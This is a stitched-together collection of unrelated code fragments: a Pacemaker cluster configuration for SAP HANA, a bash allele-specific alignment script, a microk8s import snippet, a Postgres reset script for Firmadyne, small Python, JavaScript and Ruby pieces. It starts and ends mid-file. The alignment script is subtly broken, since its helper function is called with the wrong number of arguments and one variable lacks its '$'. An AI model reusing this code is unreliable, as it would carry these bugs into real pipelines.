<nvpair id="nodes-1084787210-lpa_prd_lpt" name="lpa_prd_lpt" value="1618862646"/>
<nvpair id="nodes-1084787210-hana_prd_vhost" name="hana_prd_vhost" value="hana01"/>
<nvpair id="nodes-1084787210-hana_prd_site" name="hana_prd_site" value="Site1"/>
<nvpair id="nodes-1084787210-hana_prd_op_mode" name="hana_prd_op_mode" value="logreplay"/>
<nvpair id="nodes-1084787210-hana_prd_srmode" name="hana_prd_srmode" value="sync"/>
<nvpair id="nodes-1084787210-hana_prd_remoteHost" name="hana_prd_remoteHost" value="hana02"/>
</instance_attributes>
</node>
<node id="1084787211" uname="hana02">
<instance_attributes id="nodes-1084787211">
<nvpair id="nodes-1084787211-lpa_prd_lpt" name="lpa_prd_lpt" value="30"/>
<nvpair id="nodes-1084787211-hana_prd_op_mode" name="hana_prd_op_mode" value="logreplay"/>
<nvpair id="nodes-1084787211-hana_prd_vhost" name="hana_prd_vhost" value="hana02"/>
<nvpair id="nodes-1084787211-hana_prd_remoteHost" name="hana_prd_remoteHost" value="hana01"/>
<nvpair id="nodes-1084787211-hana_prd_site" name="hana_prd_site" value="Site2"/>
<nvpair id="nodes-1084787211-hana_prd_srmode" name="hana_prd_srmode" value="sync"/>
</instance_attributes>
</node>
</nodes>
<resources>
<primitive id="stonith-sbd" class="stonith" type="external/sbd">
<instance_attributes id="stonith-sbd-instance_attributes">
<nvpair name="pcmk_delay_max" value="30s" id="stonith-sbd-instance_attributes-pcmk_delay_max"/>
</instance_attributes>
</primitive>
<primitive id="rsc_ip_PRD_HDB00" class="ocf" provider="heartbeat" type="IPaddr2">
<!--#####################################################-->
<!--# Fencing agents - Native agents for cloud providers-->
<!--#####################################################-->
<!--######################################-->
<!--# Floating IP address resource agents-->
<!--######################################-->
<instance_attributes id="rsc_ip_PRD_HDB00-instance_attributes">
<nvpair name="ip" value="192.168.138.12" id="rsc_ip_PRD_HDB00-instance_attributes-ip"/>
<nvpair name="cidr_netmask" value="24" id="rsc_ip_PRD_HDB00-instance_attributes-cidr_netmask"/>
<nvpair name="nic" value="eth1" id="rsc_ip_PRD_HDB00-instance_attributes-nic"/>
</instance_attributes>
<operations>
<op name="start" timeout="20" interval="0" id="rsc_ip_PRD_HDB00-start-0"/>
<op name="stop" timeout="20" interval="0" id="rsc_ip_PRD_HDB00-stop-0"/>
<op name="monitor" interval="10" timeout="20" id="rsc_ip_PRD_HDB00-monitor-10"/>
</operations>
</primitive>
<primitive id="rsc_exporter_PRD_HDB00" class="systemd" type="prometheus-hanadb_exporter@PRD_HDB00">
<!--#######################################-->
<!--# non-production HANA - Cost optimized-->
<!--#######################################-->
<!--###############################-->
<!--# Active/Active HANA resources-->
<!--###############################-->
<!--######################################-->
<!--# prometheus-hanadb_exporter resource-->
<!--######################################-->
<operations>
<op name="start" interval="0" timeout="100" id="rsc_exporter_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="100" id="rsc_exporter_PRD_HDB00-stop-0"/>
<op name="monitor" interval="10" id="rsc_exporter_PRD_HDB00-monitor-10"/>
</operations>
<meta_attributes id="rsc_exporter_PRD_HDB00-meta_attributes">
<nvpair name="target-role" value="Started" id="rsc_exporter_PRD_HDB00-meta_attributes-target-role"/>
</meta_attributes>
</primitive>
<master id="msl_SAPHana_PRD_HDB00">
<meta_attributes id="msl_SAPHana_PRD_HDB00-meta_attributes">
<nvpair name="clone-max" value="2" id="msl_SAPHana_PRD_HDB00-meta_attributes-clone-max"/>
<nvpair name="clone-node-max" value="1" id="msl_SAPHana_PRD_HDB00-meta_attributes-clone-node-max"/>
<nvpair name="interleave" value="true" id="msl_SAPHana_PRD_HDB00-meta_attributes-interleave"/>
</meta_attributes>
<primitive id="rsc_SAPHana_PRD_HDB00" class="ocf" provider="suse" type="SAPHana">
<instance_attributes id="rsc_SAPHana_PRD_HDB00-instance_attributes">
<nvpair name="SID" value="PRD" id="rsc_SAPHana_PRD_HDB00-instance_attributes-SID"/>
<nvpair name="InstanceNumber" value="00" id="rsc_SAPHana_PRD_HDB00-instance_attributes-InstanceNumber"/>
<nvpair name="PREFER_SITE_TAKEOVER" value="True" id="rsc_SAPHana_PRD_HDB00-instance_attributes-PREFER_SITE_TAKEOVER"/>
<nvpair name="AUTOMATED_REGISTER" value="False" id="rsc_SAPHana_PRD_HDB00-instance_attributes-AUTOMATED_REGISTER"/>
<nvpair name="DUPLICATE_PRIMARY_TIMEOUT" value="7200" id="rsc_SAPHana_PRD_HDB00-instance_attributes-DUPLICATE_PRIMARY_TIMEOUT"/>
</instance_attributes>
<operations>
<op name="start" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-stop-0"/>
<op name="promote" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-promote-0"/>
<op name="monitor" interval="60" role="Master" timeout="700" id="rsc_SAPHana_PRD_HDB00-monitor-60"/>
<op name="monitor" interval="61" role="Slave" timeout="700" id="rsc_SAPHana_PRD_HDB00-monitor-61"/>
</operations>
</primitive>
</master>
<clone id="cln_SAPHanaTopology_PRD_HDB00">
<meta_attributes id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes">
<nvpair name="is-managed" value="true" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-is-managed"/>
<nvpair name="clone-node-max" value="1" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-clone-node-max"/>
<nvpair name="interleave" value="true" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-interleave"/>
</meta_attributes>
<primitive id="rsc_SAPHanaTopology_PRD_HDB00" class="ocf" provider="suse" type="SAPHanaTopology">
<!--#####################-->
<!--# SAP HANA resources-->
<!--#####################-->
<instance_attributes id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes">
<nvpair name="SID" value="PRD" id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes-SID"/>
<nvpair name="InstanceNumber" value="00" id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes-InstanceNumber"/>
</instance_attributes>
<operations>
<op name="monitor" interval="10" timeout="600" id="rsc_SAPHanaTopology_PRD_HDB00-monitor-10"/>
<op name="start" interval="0" timeout="600" id="rsc_SAPHanaTopology_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="300" id="rsc_SAPHanaTopology_PRD_HDB00-stop-0"/>
</operations>
</primitive>
</clone>
</resources>
<constraints>
<rsc_colocation id="col_saphana_ip_PRD_HDB00" score="2000" rsc="rsc_ip_PRD_HDB00" rsc-role="Started" with-rsc="msl_SAPHana_PRD_HDB00" with-rsc-role="Master"/>
<rsc_order id="ord_SAPHana_PRD_HDB00" kind="Optional" first="cln_SAPHanaTopology_PRD_HDB00" then="msl_SAPHana_PRD_HDB00"/>
<rsc_colocation id="col_exporter_PRD_HDB00" score="+INFINITY" rsc="rsc_exporter_PRD_HDB00" rsc-role="Started" with-rsc="msl_SAPHana_PRD_HDB00" with-rsc-role="Master"/>
</constraints>
<rsc_defaults>
<meta_attributes id="rsc-options">
<nvpair name="resource-stickiness" value="1000" id="rsc-options-resource-stickiness"/>
<nvpair name="migration-threshold" value="5000" id="rsc-options-migration-threshold"/>
</meta_attributes>
</rsc_defaults>
<op_defaults>
<meta_attributes id="op-options">
<nvpair name="timeout" value="600" id="op-options-timeout"/>
<nvpair name="record-pending" value="true" id="op-options-record-pending"/>
</meta_attributes>
</op_defaults>
</configuration>
<status>
<node_state id="1084787210" uname="hana01" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
<transient_attributes id="1084787210">
<instance_attributes id="status-1084787210">
<nvpair id="status-1084787210-master-rsc_SAPHana_PRD_HDB00" name="master-rsc_SAPHana_PRD_HDB00" value="150"/>
<nvpair id="status-1084787210-hana_prd_version" name="hana_prd_version" value="2.00.040.00.1553674765"/>
<nvpair id="status-1084787210-hana_prd_clone_state" name="hana_prd_clone_state" value="PROMOTED"/>
<nvpair id="status-1084787210-hana_prd_sync_state" name="hana_prd_sync_state" value="PRIM"/>
<nvpair id="status-1084787210-hana_prd_roles" name="hana_prd_roles" value="4:P:master1:master:worker:master"/>
</instance_attributes>
</transient_attributes>
<lrm id="1084787210">
<lrm_resources>
<lrm_resource id="stonith-sbd" type="external/sbd" class="stonith">
<lrm_rsc_op id="stonith-sbd_last_0" operation_key="stonith-sbd_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="2:0:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;2:0:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="6" rc-code="0" op-status="0" interval="0" last-rc-change="1618834289" last-run="1618834289" exec-time="1270" queue-time="0" op-digest="265be3215da5e5037d35e7fe1bcc5ae0"/>
</lrm_resource>
<lrm_resource id="rsc_exporter_PRD_HDB00" type="prometheus-hanadb_exporter@PRD_HDB00" class="systemd">
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_last_0" operation_key="rsc_exporter_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="8:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="38" rc-code="0" op-status="0" interval="0" last-rc-change="1618834310" last-run="1618834310" exec-time="2267" queue-time="0" op-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_monitor_10000" operation_key="rsc_exporter_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="9:7:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;9:7:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="41" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834310" exec-time="2" queue-time="0" op-digest="0d721f3bcf63b8d121ad4839b260e42a"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHanaTopology_PRD_HDB00" type="SAPHanaTopology" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_last_0" operation_key="rsc_SAPHanaTopology_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="20:2:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;20:2:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="29" rc-code="0" op-status="0" interval="0" last-rc-change="1618834294" last-run="1618834294" exec-time="3852" queue-time="0" op-digest="2d8d79c3726afb91c33d406d5af79b53" op-force-restart="" op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation_key="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="24:3:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;24:3:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="32" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834298" exec-time="4107" queue-time="0" op-digest="64db68ca3e12e0d41eb98ce63b9610d2"/>
</lrm_resource>
<lrm_resource id="rsc_ip_PRD_HDB00" type="IPaddr2" class="ocf" provider="heartbeat">
<lrm_rsc_op id="rsc_ip_PRD_HDB00_last_0" operation_key="rsc_ip_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="7:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;7:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="25" rc-code="0" op-status="0" interval="0" last-rc-change="1618834290" last-run="1618834290" exec-time="90" queue-time="0" op-digest="6e3bbd07a422997302424264856a2840"/>
<lrm_rsc_op id="rsc_ip_PRD_HDB00_monitor_10000" operation_key="rsc_ip_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="8:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:1:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="26" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834290" exec-time="57" queue-time="0" op-digest="8313e7cc541e6aee1c924e232d7f548b"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHana_PRD_HDB00" type="SAPHana" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_failure_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="3:1:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;3:1:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="19" rc-code="0" op-status="0" interval="0" last-rc-change="1618834290" last-run="1618834290" exec-time="2801" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_0" operation_key="rsc_SAPHana_PRD_HDB00_promote_0" operation="promote" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="12:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;12:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="40" rc-code="0" op-status="0" interval="0" last-rc-change="1618834308" last-run="1618834308" exec-time="2347" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1" op-force-restart=" INSTANCE_PROFILE " op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_monitor_60000" operation_key="rsc_SAPHana_PRD_HDB00_monitor_60000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="14:7:8:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:8;14:7:8:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="42" rc-code="8" op-status="0" interval="60000" last-rc-change="1618834314" exec-time="4086" queue-time="0" op-digest="05b857e482ebd46019d347fd55ebbcdb"/>
</lrm_resource>
</lrm_resources>
</lrm>
</node_state>
<node_state id="1084787211" in_ccm="true" crmd="online" crm-debug-origin="do_update_resource" uname="hana02" join="member" expected="member">
<lrm id="1084787211">
<lrm_resources>
<lrm_resource id="stonith-sbd" type="external/sbd" class="stonith">
<lrm_rsc_op id="stonith-sbd_last_0" operation_key="stonith-sbd_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="5:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;5:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="5" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="31" queue-time="0" op-digest="265be3215da5e5037d35e7fe1bcc5ae0"/>
</lrm_resource>
<lrm_resource id="rsc_ip_PRD_HDB00" type="IPaddr2" class="ocf" provider="heartbeat">
<lrm_rsc_op id="rsc_ip_PRD_HDB00_last_0" operation_key="rsc_ip_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="6:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;6:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="9" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="44" queue-time="0" op-digest="6e3bbd07a422997302424264856a2840"/>
</lrm_resource>
<lrm_resource id="rsc_exporter_PRD_HDB00" type="prometheus-hanadb_exporter@PRD_HDB00" class="systemd">
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_last_0" operation_key="rsc_exporter_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="7:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:7;7:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="13" rc-code="7" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="8" queue-time="0" op-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHana_PRD_HDB00" type="SAPHana" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="18" rc-code="0" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="3035" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1" op-force-restart=" INSTANCE_PROFILE " op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_last_failure_0" operation_key="rsc_SAPHana_PRD_HDB00_monitor_0" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:15:7:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="18" rc-code="0" op-status="0" interval="0" last-rc-change="1618834616" last-run="1618834616" exec-time="3035" queue-time="0" op-digest="ff4ff123bc6f906497ef0ef5e44dffd1"/>
<lrm_rsc_op id="rsc_SAPHana_PRD_HDB00_monitor_61000" operation_key="rsc_SAPHana_PRD_HDB00_monitor_61000" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="17:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;17:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="24" rc-code="0" op-status="0" interval="61000" last-rc-change="1618834619" exec-time="3645" queue-time="0" op-digest="05b857e482ebd46019d347fd55ebbcdb"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHanaTopology_PRD_HDB00" type="SAPHanaTopology" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_last_0" operation_key="rsc_SAPHanaTopology_PRD_HDB00_start_0" operation="start" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="28:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;28:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="25" rc-code="0" op-status="0" interval="0" last-rc-change="1618834619" last-run="1618834619" exec-time="3555" queue-time="0" op-digest="2d8d79c3726afb91c33d406d5af79b53" op-force-restart="" op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation_key="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="do_update_resource" crm_feature_set="3.3.0" transition-key="29:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;29:16:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana02" call-id="26" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834623" exec-time="3714" queue-time="0" op-digest="64db68ca3e12e0d41eb98ce63b9610d2"/>
</lrm_resource>
</lrm_resources>
</lrm>
<transient_attributes id="1084787211">
<instance_attributes id="status-1084787211">
<nvpair id="status-1084787211-hana_prd_clone_state" name="hana_prd_clone_state" value="DEMOTED"/>
<nvpair id="status-1084787211-master-rsc_SAPHana_PRD_HDB00" name="master-rsc_SAPHana_PRD_HDB00" value="100"/>
<nvpair id="status-1084787211-hana_prd_version" name="hana_prd_version" value="2.00.040.00.1553674765"/>
<nvpair id="status-1084787211-hana_prd_roles" name="hana_prd_roles" value="4:S:master1:master:worker:master"/>
<nvpair id="status-1084787211-hana_prd_sync_state" name="hana_prd_sync_state" value="SOK"/>
</instance_attributes>
</transient_attributes>
</node_state>
</status>
</cib>
EOF
|
#!/bin/bash
MEA_BIN=`dirname $0`
source $MEA_BIN/mea.config
##############################################################################
############# Module 3: allele-specific alignment
##############################################################################
PARAM_VALID=1
PARAM_SINGLE_READS=1
if [ "$1" = "-s" ]; then
if [ $# -eq 7 ]; then
PARAM_FASTQ_FILE=$2
PARAM_GENOME=$3
PARAM_REFERENCE_GENOME=$4
PARAM_STRAIN1=$5
PARAM_STRAIN2=$6
PARAM_BAM_PREFIX=$7
else
PARAM_VALID=0
fi
elif [ "$1" = "-p" ]; then
if [ $# -eq 8 ]; then
PARAM_SINGLE_READS=0
PARAM_FASTQ_FILE1=$2
PARAM_FASTQ_FILE2=$3
PARAM_GENOME=$4
PARAM_REFERENCE_GENOME=$5
PARAM_STRAIN1=$6
PARAM_STRAIN2=$7
PARAM_BAM_PREFIX=$8
else
PARAM_VALID=0
fi
else
PARAM_VALID=0
fi
if [ $PARAM_VALID = 0 ]; then
echo "
Usage:
mea alignReads <-s/-p> input_reads_1 [input_reads_2] genome_concat reference_genome strain1 strain2 outputPrefix
Options:
-s to align single-end reads (requires one input file)
-p to align paired-end reads (requires two input files)
input_reads_1
the 1st input reads file in fastq.
(fastq.gz or bam is supported when using BWA)
input_reads_2
(paired end) the 2nd input reads file in fastq.
(fastq.gz or bam is supported when using BWA)
genome_concat
path to the indexed reference for concatenated insilico genome.
for BWA, specifiy path to the fasta.
for Bowtie2 and Tophat2, specify path and basename of index files
for Bismark, specify genome folder, excluding <Bisulphite_Genome>
reference_genome
path to the reference genome indices folder
strain1 name of strain1
(e.g. hap1 or CASTEiJ)
strain2 name of strain2
(e.g. hap2 or C57BL6J)
outputPrefix prefix for output files, including the full path, without an extension
(e.g. ./TSC_H3K36me3 )
"
exit 1
fi
#------------------------------------------------------------------------------------
# detect the allelic reads from the reads aligned to the concatenated genome
#------------------------------------------------------------------------------------
function detectAllelicConcatenated {
printProgress "[detectAllelicConcatenated] Started"
local PARAM_INPUT_SAM=$1
local PARAM_STRAIN=$2
local PARAM_QUALITY=$3
local PARAM_OUT_PREFIX=$4
# output header first
samtools view -H "$PARAM_INPUT_SAM" \
| awk -v ref="$PARAM_STRAIN" '($0 ~ ref) {print $0}' \
| sed 's/'"$PARAM_STRAIN"'_//g' \
> "$PARAM_OUT_PREFIX".sam
# append reads
samtools view $PARAM_INPUT_SAM \
| awk -v ref="$PARAM_STRAIN" '(($3 ~ ref)&&($5'"$PARAM_QUALITY"')) {print $0}' \
| sed 's/'"$PARAM_STRAIN"'_//g' \
>> "$PARAM_OUT_PREFIX".sam
# convert to bam
samtools view -b "$PARAM_OUT_PREFIX".sam > "$PARAM_OUT_PREFIX".unsorted.bam
# sort by coordinates
samtools sort "$PARAM_OUT_PREFIX".unsorted.bam -o "$PARAM_OUT_PREFIX"
rm -f "$PARAM_OUT_PREFIX".sam
rm -f "$PARAM_OUT_PREFIX".unsorted.bam
}
#------------------------------------------------------------------------------------
# alignReads
#------------------------------------------------------------------------------------
if [ $PARAM_SINGLE_READS = 1 ]; then
STAR --runMode alignReads --genomeDir "$PARAM_GENOME" "$MEA_STAR_ALN_PARAMS" --readFilesIn "$PARAM_FASTQ_FILE"
mv Aligned.out.sam "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam
mv Log.out "$PARAM_BAM_PREFIX"_STAR_RunParameters.tsv
mv Log.final.out "$PARAM_BAM_PREFIX"_STAR_AlignmentSummary.tsv
STAR --runMode alignReads --genomeDir "$PARAM_REFERENCE_GENOME" "$MEA_STAR_ALN_TOTAL_PARAMS" --readFilesIn "$PARAM_FASTQ_FILE"
mv Aligned.out.sam "$PARAM_BAM_PREFIX"_total.sam
samtools sort "$PARAM_BAM_PREFIX"_total.sam -o "$PARAM_BAM_PREFIX"_total.bam
samtools index "$PARAM_BAM_PREFIX"_total.bam
mv Log.out "$PARAM_BAM_PREFIX"_total_STAR_referenceRunParameters.tsv
mv Log.final.out "$PARAM_BAM_PREFIX"_total_STAR_referenceAlignmentSummary.tsv
detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN1" "$PARAM_GENOME" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"
detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN2" "$PARAM_GENOME" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN2"
rm SJ.out.tab Log.progress.out
else #[ $PARAM_SINGLE_READS = 0 ]
STAR --runMode alignReads --genomeDir "$PARAM_GENOME" "$MEA_STAR_ALN_PARAMS" --readFilesIn "$PARAM_FASTQ_FILE1" "$PARAM_FASTQ_FILE2"
mv Aligned.out.sam "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam
mv Log.out "$PARAM_BAM_PREFIX"_STAR_RunParameters.tsv
mv Log.final.out "$PARAM_BAM_PREFIX"_STAR_AlignmentSummary.tsv
STAR --runMode alignReads --genomeDir "$PARAM_REFERENCE_GENOME" "MEA_STAR_ALN_TOTAL_PARAMS" --readFilesIn "$PARAM_FASTQ_FILE1" "$PARAM_FASTQ_FILE2"
mv Aligned.out.sam "$PARAM_BAM_PREFIX"_total.sam
samtools sort "$PARAM_BAM_PREFIX"_total.sam -o "$PARAM_BAM_PREFIX"_total.bam
samtools index "$PARAM_BAM_PREFIX"_total.bam
mv Log.out "$PARAM_BAM_PREFIX"_total_STAR_referenceRunParameters.tsv
mv Log.final.out "$PARAM_BAM_PREFIX"_total_STAR_referenceAlignmentSummary.tsv
detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN1" "$PARAM_GENOME" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"
detectAllelicConcatenated "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN1"_"$PARAM_STRAIN2".sam "$PARAM_STRAIN2" "$PARAM_GENOME" "== 255" "$PARAM_BAM_PREFIX"_"$PARAM_STRAIN2"
rm SJ.out.tab Log.progress.out
fi
|
ls ./tmp -l --block-size=MB
rm -rf ./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar
gzip --decompress ./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar.gz
/snap/bin/microk8s ctr image rm docker.io/$PROJECT_NAME/bot:$HOST_TYPE
/snap/bin/microk8s ctr image import ./tmp/$PROJECT_NAME-bot-$HOST_TYPE.tar |
#!/bin/bash
set -e
if [[ ${USER} == "root" ]]; then
echo "Please run this script without root privilege."
exit 1
fi
if [ -e ../configure.sh ]; then
source ../configure.sh
elif [ -e ./configure.sh ]; then
source ./configure.sh
else
echo "Error: Could not find 'configure.sh'!"
exit 1
fi
sudo systemctl stop postgresql.service
sudo rm -rf /var/lib/postgres/data
sudo mkdir /var/lib/postgres/data
sudo chmod -R 700 /var/lib/postgres/data
sudo chown -R postgres:postgres /var/lib/postgres/data
sudo -u postgres initdb --locale $LANG -E UTF-8 -D '/var/lib/postgres/data'
sudo systemctl start postgresql.service
sudo -u postgres createuser firmadyne -s
sudo -u postgres createdb -O firmadyne -U firmadyne firmware
sudo -u postgres psql -d firmware < ${DB_DIR}/schema
echo "Database cleared!"
|
def caseFolding(string):
return string.lower()
print(caseFolding("This Is A Test!")) # this is a test! |
def fibonacci(limit):
a, b = 0, 1
for i in range(limit):
print(a, end=' ')
a, b = b, a+b
fibonacci(10) |
import * as types from '../types/languages';
export const startFetchLanguage = () => ({
type : types.FETCH_LANGUAGES_STARTED,
payload: {},
});
export const finishFetchLanguage = (languages) => ({
type : types.FETCH_LANGUAGES_FINISHED,
payload: languages,
});
export const failFetchLanguage = (error) => ({
type : types.FETCH_LANGUAGES_FAILED,
payload: error,
});
|
class WebAppStrategy:
def get_app_name(self):
raise NotImplementedError
def get_manifest_json(self):
raise NotImplementedError
def get_store_path(self, relative_path=''):
raise NotImplementedError
def get_root_path(self, relative_path=''):
raise NotImplementedError
def get_app_base_url(self):
raise NotImplementedError
class ConcreteWebAppStrategy(WebAppStrategy):
def get_app_name(self):
# Implement logic to retrieve the app name
return "MyWebApp"
def get_manifest_json(self):
# Implement logic to retrieve the manifest JSON
return {"name": "MyWebApp", "version": "1.0"}
def get_store_path(self, relative_path=''):
# Implement logic to retrieve the store path
return "/path/to/store" + relative_path
def get_root_path(self, relative_path=''):
# Implement logic to retrieve the root path
return "/path/to/root" + relative_path
def get_app_base_url(self):
# Implement logic to retrieve the base URL
return "https://www.mywebapp.com" |
require File.dirname(__FILE__) + '/../spec_helper'
include PoolParty::Cloud
include PoolParty::Resources
class TestServiceClass
plugin :test_service do
def enable
has_file(:name => "/etc/poolparty/lobos")
end
end
end
describe "Cloud" do
